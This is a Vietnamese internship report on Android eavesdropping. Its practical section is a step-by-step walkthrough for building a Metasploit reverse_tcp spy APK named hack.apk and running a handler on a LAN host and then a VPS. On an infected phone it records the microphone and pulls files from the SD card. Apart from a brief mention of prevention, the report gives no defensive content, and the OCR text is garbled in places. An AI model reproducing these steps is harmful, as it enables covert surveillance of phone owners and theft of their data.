BÁO CÁO THỰC TẬP TỐT NGHIỆP ĐỀ TÀI: Nghiên cứu phần mềm cho phép nghe điện thoại Android BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG TRÍCH YẾU Ngày nay, khoa học công nghệ ngày phát triển keo theo nhu cầu sử dụng công nghệ ngƣời ngày tăng, đặc biệt lĩnh vực điện thoại di động với nhiều smartphone ngày đƣợc sản xuất phát triển, để thỏa mãn đƣợc nhu cầu công nghệ ngƣời dùng nhiều hãng điện thoại lớn cho đời nhiều smartphone cao cấp chạy hệ điều hành android, iOS…Trong đặc biệt hệ điều hành android đƣợc nhiều hãng điện thoại sử dùng làm hệ điều hành cho smartphone mà chĩnh hãng sản xuất Cũng phổ biến ngày phát triển android nên cạnh tranh tăng xuất nhiều tình trạng đánh cắp thơng tin ngƣời dùng, xâm nhập quyền riêng tƣ ngƣời nên đề bảo mật cho ngƣời dùng đƣợc đặt lên hang đầu Trong thời gian thực tập Trung Tâm Athena từ ngày 01/07/2014 đến ngày 18/07/2014 với đề tài “Nghiên cứu phần mềm cho phép nghe điện thoại android” đƣợc ứng dụng vào thực tiễn nhiều giúp hiểu rõ hệ điều hành android đề nắm bắt cách cơng đánh cắp thơng tin ngƣời dùng biết đƣợc cách phịng tránh để góp phần đảm bảo cho ngƣời sử dụng thấy an tồn Qua q tình làm việc Trung Tâm đƣợc tạo nhiều điều kiện để hồn thành, tích lũy đƣơc nhiều kinh nghiệm cho thân nhƣ biết đƣợc thiếu sót thân để tơi ngày hồn thiện Tơi xin cam kết, kết đạt đƣợc tự thực dƣới hƣớng dẫn thầy Võ Đổ Thắng Các bƣớc cần thiết đề hoàn thành đề tài đƣợc ghi lại số video có thuyết minh Một số video ghi lại trình thực đƣợc liệt kê bên dƣới Danh sách Video: - Giới thiệu thân, quan thực tập để tài thực http://youtu.be/YKKSUzWRTjo Hƣớng dẫn cài đặt nghiên cứu kali linux http://youtu.be/P6RZR2p3RJc Hƣớng dẫn tạo mã độc kali linux (local) mã độc VPS http://youtu.be/5pkMrE0WWjA Hƣớng dẫn xâm nhập vào android http://youtu.be/yD2kvnx8pYk Thuận lợi, khó khăn, kết kinh nghiệm đạt đƣợc http://youtu.be/HUBE3eks0Ok SVTT: BÙI TỐ LUÂN i BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG LỜI CẢM ƠN TRƢỜNG ĐẠI HỌC BÁCH KHOA TP.HCM & KHOA KHOA HỌC VÀ KĨ THUẬT MÁY TÍNH Em xin chân thành cảm ơn Trƣờng Đại Học Bách Khoa Tp.HCM Khoa Khoa Học & Kĩ Thuật Máy Tính tạo điều kiện cho em học tập nhƣ thực tập học kì Trong lần thực tập em tích lũy đƣợc nhiều kinh nghiệm vài học quý báo cho thân Những kinh nghiệm học lần thực tập giúp em hoàn thiện học tập nhƣ công việc Em xin chân thành cảm ơn quý thầy cô Khoa luôn tận tình dẫn, giảng dạy trang bị cho em kiến thức cần thiết giúp đỡ em nhiều để hoàn thành tốt đợt thực tập Trong trình thực tập em cố gắng để hồn thành cơng việc với tất nổ lực thân, nhƣng tránh khỏi thiếu sót q trình thực tập mong nhận đƣợc thông cảm quý thầy cô Một lần em xin chân thành cảm ơn TP.Hồ Chí Minh, Ngày 12 Tháng 08 Năm 2014 Kí Tên Bùi Tố Luân SVTT: BÙI TỐ LUÂN ii BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG LỜI CẢM ƠN TRUNG TÂM ATHENA Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Athena, thầy Võ Đỗ Thắng toàn thể anh, chị, bạn Trung Tâm tận tình giúp đỡ em thời gian thực tập, tạo điều kiện tốt để em đƣợc thực tập tốt Trung Tâm Qua đợt thực tập em tích lũy cho thân đƣợc nhiều kinh nghiệm quý báo, kinh nghiệm giúp em hồn thiện thân hơn,và giúp em làm tốt công việc sau Trong thời gian thực tập Trung Tâm em có cố gắng để hồn thành báo cao thực tập cách tốt với tất nổ lực thân, nhƣng tránh khỏi thiếu sót q trình thực tập, mong nhận đƣợc thông cảm quý thầy cô Trung Tâm đặc biệt Thầy Võ Đỗ Thắng Một lần em xin chân thành cảm ơn TP.Hồ Chí Minh, Ngày 12 Tháng 08 Năm 2014 Kí tên Bùi Tố Luân Hình chụp GVHD Võ Đỗ Thắng (bên phải) với SVTT Bùi Tố Luân (bên trái) SVTT: BÙI TỐ LUÂN iii BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG NHẬN XÉT CỦA TRUNG TÂM THỰC TẬP SVTT: BÙI TỐ LUÂN iv BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG NHẬN XÉT CỦA GIÁO VIÊN HƢỚNG DẪN SVTT: BÙI TỐ LUÂN v BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG LỜI MỞ ĐẦU Cùng với phát triển khoa học công nghệ ngày tăng, nhu cầu liên lạc trao đổi thông tin nhu cập nhật thông tin cách nhanh chóng, để đáp ứng nhu cầu cần thiết khoa học cơng nghệ sản xuất phát triển nhiều sản phẩm công nghệ phù hợp cho mục đích sử dụng nhiều ngƣời, mà đáng kể đến sản phẩm điện thoại di động, smartphone Nhiều hãng sản xuất cho đời nhiều điện thoại di động, smartphone thông minh đáp ứng đƣợc nhu cầu ngƣời dùng, với phát triển ngày mạnh hệ điều hành android, nhiều điện thoại, smartphone chạy hệ điều hành đời Cũng phát triển ngày mạnh android kéo theo nhu cầu cần đƣợc bảo mật tăng cao, việc bảo mật điện thoại smartphone cần thiết để tránh việc bị thông tin, liệu quan trọng vào tay ngƣời có ý đồ xấu Nhận thức đƣợc vấn đề muốn hiểu rõ hệ điều hành android nên chọn đề tài “nghiên cứu phần mềm cho phép nghe điện thoại sử dụng android” Để hiểu rõ cách thức xâm nhập vào điện thoại android đánh cắp thơng tin gữi ngồi, báo cáo trình bày chi tiết đề Qua em xin lần cảm ơn Trung Tâm Athena Thầy Võ Đỗ Thắng tận tình giúp đỡ em hoàn thành báo cáo SVTT: BÙI TỐ LUÂN vi BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG MỤC LỤC TRÍCH YẾU i LỜI CẢM ƠN ii TRƢỜNG ĐẠI HỌC BÁCH KHOA TP.HCM & KHOA KHOA HỌC VÀ KĨ THUẬT MÁY TÍNH ii LỜI CẢM ƠN iii TRUNG TÂM ATHENA iii NHẬN XÉT CỦA TRUNG TÂM THỰC TẬP iv NHẬN XÉT CỦA GIÁO VIÊN HƢỚNG DẪN v LỜI MỞ ĐẦU vi Giới thiệu Trung Tâm ATHENA I Lĩnh vực hoạt động Đội ngũ giảng viên Cơ sở vật chất Dịch vụ hổ trợ Giới thiệu đề tài, lý chọn đề tài giới thiệu android, malware II Giới thiệu android a Lịch sử phát triển android b Bảo mật quyền riêng tư Malware a Malware android b Ví dụ malware android Nội dung thực tập III Thực local host a Cài đặt nghiên cứu Kali (backtrack) b Cách tạo mã độc kali (Backtrack) 13 c Cách triển khai mã độc xâm nhập vào android 14 Làm sever VPS (môi trường Internet) 16 a Cài đặt Metasploit VPS 16 b Tạo mã xâm nhập VPS 18 c Xâm nhập vào android 18 SVTT: BÙI TỐ LUÂN vii BÁO CÁO THỰC TẬP IV V GVHD: VÕ ĐỖ THẮNG Tổng kết 24 Kinh nghiệm đạt 24 Kết đạt sau thực tập 24 Hạn chế khả mở rộng đề tài 24 Khả ứng dụng đề tài vào thực tế 24 Chi phí để triển khai đề tài 24 Tài liệu tham khảo 25 SVTT: BÙI TỐ LUÂN viii BÁO CÁO THỰC TẬP I GVHD: VÕ ĐỖ THẮNG Giới thiệu Trung Tâm ATHENA Có hai chi nhánh: + Trung Tâm ATHENA - Bis Đinh Tiên Hoàng, DaKao, Q1, TP.HCM + Trung Tâm ATHENA – 92 Nguyễn Đình Chiểu, Dakao, Q1, TP.HCM Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA đƣợc thành lập từ năm 2004, tổ chức qui tụ nhiều tri thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lĩnh vực CNTT, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đƣa cơng nghệ thơng tin nghành kinh tế mũi nhọn, góp phần phát triển nƣớc nhà Lĩnh vực hoạt động Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thƣơng mại điện tử theo tiêu chuẩn quốc tế hãng tiếng nhƣ Microsoft, Cisco, Oracle, Linux LPI, CEH… Song song đó, trung tâm ATHENA cịn có chƣơng trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị nhƣ Bộ Quốc Phịng, Bộ Cơng An, Ngân Hàng,doanh nghiệp, quan phủ, tổ chức hành chính… Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành nhƣ Cục Cơng Nghệ Thơng Tin- Bộ Quốc Phịng, Bộ Công An, Sở Thông Tin Truyền Thông tỉnh, bƣu điện tỉnh… Ngồi chƣơng trình đào tạo, Trung Tâm ATHENA cịn có nhiều chƣơng trình hợp tác trao đổi công nghệ với nhiều đại học lớn nhƣ đại học Bách Khoa Tp.Hồ Chí Minh, Học Viện An Ninh Nhân Dân(Thủ Đức), Học Viện Bƣu Chính Viễn Thơng, Hiệp hội an tồn thơng tin(VNISA), Viện Kỹ Thuật Qn Sự… Đội ngũ giảng viên Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trƣờng đại học hàng đầu nƣớc… Tất giảng viên ATHENA phải có chứng quốc tế nhƣ MCSA, MCSE, CCNA, CCNP, Security+, CEH, có sƣ phạm Quốc Tế(Microsoft Certified Trainer) Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy trung tâm ATHENA Bên cạnh đó, Các giảng viên ATHENA thƣờng tu nghiệp cập nhật kiến thức công nghệ từ nƣớc tiên tiến nhƣ Mỹ, Pháp, Hà Lan, Singapore… truyền đạt cơng nghệ chƣơng trình đào tạo trung tâm ATHENA SVTT: BÙI TỐ LUÂN BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Bƣớc để mặc định American English click Continue đến bƣớc ta nhập tên Hostname ta để mặc định Kali click Continue, yêu cầu nhập Domain name ta để trống click Continue Tiếp theo yêu cầu nhập passwords: khung Root passwords ta nhập pass mà ta muốn sử dụng, khung Re-enter password to verify ta nhập lại pass vừa sau click Continue Bƣớc tiếp chọn time zone ta để mặc định click Continue, đến ta chọn Guided – use entire disk click Continue SVTT: BÙI TỐ LUÂN 11 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Bƣớc tiếp ta để mặc định chọn Continue, đến bƣớc ta chọn All file in one partion (recommended for new users) click Continue Khi đến bƣớc ta chọn Finish partitioning and write changes to disk ta click Continue chuyển đến bƣớc ta chọn Yes click Continue chờ cài đặt Kali Sau cài đặt xong, chọn No Use a network mirror, chọn Yes Boot-loader Và sau hồn tất hết phần khởi động lại, đến giao diện login ta nhập User root passwork pass ta đặt bƣớc cài đặt Kali Và nhƣ hoàn tất trình cài đặt Kali linux Vmware SVTT: BÙI TỐ LUÂN 12 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG b Cách tạo mã độc kali (Backtrack) Để tạo mã độc kali xâm nhập vào android đánh cắp thông tin, sử dụng máy ảo Kali Vmware, ta thiết lập phần network nhƣ sau: Mở máy ảo Kali Vmware Trên công cụ Vmware ta chọn VM => Settings bảng tên Virtual Machine Settings mở ta chọn Network Adapter Network connection ta chọn Bridged: connection directly to the physical network click OK Tiếp theo công cụ Vmware ta chọn Edit => Virtual Network Editor, bảng tên Virtual Network Editor mở ra, phần Vmnet information ta chọn Bridge(connect VMs directly to the external network) chọn card mạng máy thật SVTT: BÙI TỐ LUÂN 13 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Nhƣ xong phần thiết lập Network cho máy ảo Kali chạy Vmware Ta mở máy ảo kali lên mở Terminal kali lên, sau ta gõ lệnh, ifconfig để xem ip máy kali Tiếp ta gõ lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.4 lport=5784 R > /root/Desktop/hack.apk để tạo mã độc có tên hack.apk Trong lệnh lhost ta nhập địa ip máy kali, lport ta nhập port mà máy chƣa sử dụng, file hack.apk đƣợc tạo lƣu /root/Desktop/ c Cách triển khai mã độc xâm nhập vào android Sau tạo xong file mã độc, để triển khai file mã độc xâm nhập android terminal ta gõ lệnh msfconsole SVTT: BÙI TỐ LUÂN 14 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Chờ lúc msfconsole load xong Bây ta tạo handler để bắt tính hiệu truyền từ máy bị nhiễm mã độc Ta gõ lệnh sau Terminal use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.4 (ip trùng với địa ip lúc tạo file hack.apk) set lport 5784 (port trùng với port lúc tạo file hack.apk) exploit Bây ta việc chờ cho máy nhiễm file mã độc mà ta tạo trên, nhƣ ta xong phần cách triển khai mã độc xâm nhập vào android SVTT: BÙI TỐ LUÂN 15 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Làm sever VPS (môi trường Internet) a Cài đặt Metasploit VPS Để cài đặt Metasploit VPS, trƣớc tiên ta tải file cài đặt Metsploit từ trang chủ http://www.rapid7.com/products/metasploit/download.jsp Ta chọn phiên Metasploit Community Click vào DOWNLOAD METASPLOIT COMMUNITY để tiến hành tải Metasploit Sau tải file cài đặt ta mở file cài đặt Metasploit lên tiến hành cài đặt, hình cài đặt mở lên ta Click Next, đến bƣớc ta chọn I accept the agreement click Next SVTT: BÙI TỐ LUÂN 16 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Bƣớc ta chọn thƣ mục cài đặt cho Metasploit, ta để mặc định, click Next, tiếp tục click Next lần Đến ta nhập SLL Port cho Metasploit, ta cần để mặc định click Next, đến tiếp bƣớc ta nhận vào tên Server Name (ta để mặc định localhost), khung Days of validity ta để mặc định check vào Yes, trust certificate , sau ta click Next Bƣớc tiếp ta click vào Next để tiến hành cài đặt Metasploit, Sau chờ cài đặt xong ta click Finish để hồn tất q trình cài đặt Metasploit SVTT: BÙI TỐ LUÂN 17 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG b Tạo mã xâm nhập VPS Ta biết cách tạo mã xâm nhập Kali nên việc tạo mã xâm nhập VPS đƣợc tiến hành giống với việc tạo mã xâm nhập Kali, ta thay đổi bƣớc nhỏ lúc tạo file xâm nhập hack.apk (trình bày phần tạo mã độc kali) Đó lúc nhập lhost thay nhập ip máy kali, ta nhập địa ip VPS c Xâm nhập vào android Sau tạo xong mã xâm nhập VPS, ta tiến hành việc xâm nhập vào android nhƣ sau Khởi động Metasploit Console VPS SVTT: BÙI TỐ LUÂN 18 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Sau khỏi động Metasploit VPS, ta tiến hành tạo kết nối handler để bắt tín hiệu android bị nhiễm mã độc Sử dụng lệnh nhƣ phần cách triển khai mã độc xâm nhập vào android use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 14.0.21.58 (ip trùng với địa ip VPS) set lport 6748 (port trùng với port lúc tạo mã xâm nhập VPS) Bây ta chờ máy android bị nhiễm mã độc Sau nhiễm mã độc máy android gữi tín hiệu cho máy điều khiển VPS SVTT: BÙI TỐ LUÂN 19 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Nhƣ ta máy android bị nhiễm mã độc ta điều khiển để đánh cắp thông tin từ máy android bị nhiễm mã độc Để biết lệnh sử dụng ta dùng trợ giúp cách gõ lệnh help vào terminal Để xem thông tin máy android ta sử lệnh sysinfo SVTT: BÙI TỐ LUÂN 20 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Để thực ghi âm ta nhập lệnh record_mic file ghi âm đƣợc lƣu máy, file ghi âm đƣợc lƣu C:/metasploit/uLiiZrZW.wav SVTT: BÙI TỐ LUÂN 21 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Để đánh cắp thông tin từ sdcard ta sử dụng lệnh sau để xâm nhập vào sdcard máy nhiễm mã độc cd /sdcard Sau xâm nhập vào sdcard ta sử dụng lệnh ls để xem file nhƣ thƣ mục máy bị nhiễm mã độc SVTT: BÙI TỐ LUÂN 22 BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG Sau thấy đƣợc file thƣ mục sdcard máy android máy bị nhiễm, ta lấy file mà ta muốn máy điều khiển, ví dụ ta muốn lấy file xamnhap.apk từ máy bị nhiễm máy ta gõ lệnh sau: download xamnhap.apk , file bị lấy cắp đƣợc lƣu thƣ mục gốc metasploit SVTT: BÙI TỐ LUÂN 23 BÁO CÁO THỰC TẬP IV GVHD: VÕ ĐỖ THẮNG Tổng kết Kinh nghiệm đạt - Tập trung giải vấn đề gặp phải công việc - Làm việc mơi trƣờng có áp lực - Cần hồn thành cơng việc sớm - Tập trung vào vấn đề quan trọng trƣớc - Mạnh dạn học hỏi, trao đổi chia sẻ kiến thức - Chuẩn bị kĩ kế hoạch để hồn thành tốt cơng việc báo cáo - Phân chia thời gian hợp lý công việc - Cải thiện thêm kĩ (giải vấn đề, thuyết trình, làm việc độc lập, giao tiếp…) - Khả viết báo cáo Kết đạt sau thực tập - Hoàn thành tốt đề tài đƣợc giao - Hiểu rõ hệ điều hành android - Biết sử dụng thêm phần mềm hệ điều hành nhƣ BB FlashBlack, Kali Linux, Backtrack - Biết đƣợc cách cơng phịng chống sử dụng điện thoại android - Biết đƣợc q trình cơng windown qua lớp học system hacking Hạn chế khả mở rộng đề tài - Hạn chế Chỉ sử dụng cho điện thoại, máy tính bảng android - Khả mở rộng đề tài Mở rộng sang điện thoại, máy tính bảng sử dụng iOS windows phone Khả ứng dụng đề tài vào thực tế - Nhu cầu sử dụng điện thoại android giới ngày tăng nên khả ứng dụng vào thực tế đề tài cao, đƣợc ứng dụng để ngăn chặn công nhằm đánh cắp thông tin, nghe điện thoại sử dụng android Chi phí để triển khai đề tài - Thời gian thực đề tài từ 01/07/2014 – 18/08/2014 - Chi phí tiền: khơng đáng kể đƣợc Trung Tâm Athena hổ trợ tạo điều kiện tốt để hoàn thành đề tài SVTT: BÙI TỐ LUÂN 24 BÁO CÁO THỰC TẬP V GVHD: VÕ ĐỖ THẮNG Tài liệu tham khảo [1] [2] [3] [4] [5] [6] Bộ lab + CD hƣớng dẫn android Athena Bộ lab + CD hƣớng dẫn System hacking Athena Link giới thiệu Athena ( http://www.athena.com.vn/home/gioi-thieu-athena.html ) Link lịch sử android ( http://vi.wikipedia.org/wiki/Android ) Link nghiên cứu kali (http://dnasecurity.com.vn/vn/huan-luyen/cissp/9-core/270-he-dieu-hanh-pentestbacktrack-6-tien-hoa-thanh-kali-linux-p1.html ) Link malware ( http://www.tinhte.vn/threads/malware-tren-android-cai-nhin-tongquan-va-cac-cach-phong-chong.796917/ ) SVTT: BÙI TỐ LUÂN 25